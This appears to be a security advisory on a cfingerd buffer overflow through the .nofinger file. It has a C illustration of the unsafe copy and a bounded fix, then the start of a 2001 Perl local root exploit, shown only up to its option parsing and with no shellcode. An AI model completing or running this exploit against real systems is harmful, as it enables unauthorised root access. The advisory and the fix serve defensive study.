cfingerd is a finger daemon written with security as a design goal. It has received contributions from many authors and is maintained by the cfingerd development team.
cfingerd contains a buffer overflow that a local user can exploit to gain elevated privileges. Data read from a user's .nofinger file is not sufficiently validated before it is processed, so a local user who places crafted contents in that file can execute arbitrary code with the privileges of the daemon.
When cfingerd runs as root, this means root access.
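To make the class of bug concrete, here is an added example that is neither cfingerd's source nor teleh0r's exploit: a line reader in the unsafe shape the advisory describes (an unbounded copy of file content into a fixed buffer), beside a bounded replacement that rejects overlong lines instead of truncating them. The buffer size, the function names and the sample .nofinger body are assumptions constructed for the illustration.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Assumed fixed buffer size for the illustration; cfingerd's real size is not given here. */
#define LINE_BUF 64

/* Unsafe pattern: attacker-controlled file content is copied into a fixed-size
 * buffer with no length check. strcpy() writes past dst once strlen(src) >= LINE_BUF.
 * Kept only to show what the bounded version replaces; never feed it untrusted input. */
static void copy_line_unsafe(char dst[LINE_BUF], const char *src)
{
    strcpy(dst, src);
}

/* True if copy_line_unsafe() would overrun dst for this input. Lets the failure
 * condition be checked without triggering undefined behaviour. */
static bool would_overflow(const char *src)
{
    return strlen(src) + 1 > LINE_BUF;
}

/* Bounded replacement. Returns 1 for a complete line (newline stripped), 0 at end
 * of file, -1 for a line longer than dstlen - 1 characters. An overlong line is
 * rejected rather than silently truncated, and its tail is drained so the next
 * call does not resynchronise on attacker-chosen bytes. */
static int read_line_bounded(FILE *fp, char *dst, size_t dstlen)
{
    if (!fgets(dst, (int)dstlen, fp))
        return 0;
    size_t n = strlen(dst);
    if (n > 0 && dst[n - 1] == '\n') {
        dst[n - 1] = '\0';
        return 1;
    }
    /* Buffer filled with no newline: last line of the file, or an overlong line.
     * Peek at the next byte to tell the two apart. */
    int c = fgetc(fp);
    if (c == EOF || c == '\n')
        return 1;
    while (c != '\n' && c != EOF)
        c = fgetc(fp);
    return -1;
}

/* Scan a .nofinger body held in memory; report accepted and rejected line counts. */
static int count_lines(const char *body, int *rejected)
{
    FILE *fp = fmemopen((void *)body, strlen(body), "r");
    char buf[LINE_BUF];
    int accepted = 0, rc;

    *rejected = 0;
    if (!fp)
        return -1;
    while ((rc = read_line_bounded(fp, buf, sizeof buf)) != 0) {
        if (rc == 1)
            accepted++;
        else
            (*rejected)++;
    }
    fclose(fp);
    return accepted;
}

/* Constructed sample .nofinger body: an ordinary line, a line of exactly LINE_BUF - 1
 * characters (the longest that fits), a 200-character line that would overflow the
 * unsafe copy, and a final line without a trailing newline. */
static int run_sample(int *rejected)
{
    char body[512];
    size_t pos = 0;

    pos += (size_t)snprintf(body + pos, sizeof body - pos, "real line\n");
    memset(body + pos, 'A', LINE_BUF - 1); pos += LINE_BUF - 1; body[pos++] = '\n';
    memset(body + pos, 'B', 200);          pos += 200;          body[pos++] = '\n';
    pos += (size_t)snprintf(body + pos, sizeof body - pos, "last line without newline");
    body[pos] = '\0';
    return count_lines(body, rejected);
}

static int sample_accepted(void) { int r; return run_sample(&r); }
static int sample_rejected(void) { int r; run_sample(&r); return r; }

/* Would the sample's 200-character line overrun the unsafe copy? */
static bool sample_long_line_overflows(void)
{
    char line[201];
    memset(line, 'B', 200);
    line[200] = '\0';
    return would_overflow(line);
}

int main(void)
{
    char buf[LINE_BUF];
    int rejected;
    int accepted = run_sample(&rejected);

    copy_line_unsafe(buf, "short");   /* safe only because this input is short */
    printf("bounded reader: %d accepted, %d rejected; long line overflows unsafe copy: %s\n",
           accepted, rejected, sample_long_line_overflows() ? "yes" : "no");
    return 0;
}
```

Bounding the copy removes the overflow, but it is only half of the fix a practitioner would want: a daemon should not parse user-writable files such as ~/.nofinger while it still holds root, which is exactly why the exploit below notes that it fails when cfingerd is not running as root.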
#!/usr/bin/perl
# | Local buffer overflow exploit for cfingerd
# | Copyright (c) 2001 by <teleh0r@digit-labs.org>
# | All rights reserved.
# |
# | Simple exploit for the vulnerability reported
# | to bugtraq by Steven Van Acker.
# | http://www.securityfocus.com/archive/1/192844
# |
# | If cfingerd does not run as root, the exploit
# | will of course fail!
# |
# | http://www.digit-labs.org/teleh0r/
use Socket;
use File::Copy;
use Getopt::Std;

# Options: -s picks the shellcode (the author's $sjell), -p the finger port
# on the target, -o the offset applied to the return address.
getopts('s:p:o:', \%arg);
if (defined($arg{'s'})) { $sjell  = $arg{'s'} }
if (defined($arg{'p'})) { $port   = $arg{'p'} }
if (defined($arg{'o'})) { $offset = $arg{'o'} }
# shellcodes written by myself especially for
# this exploit.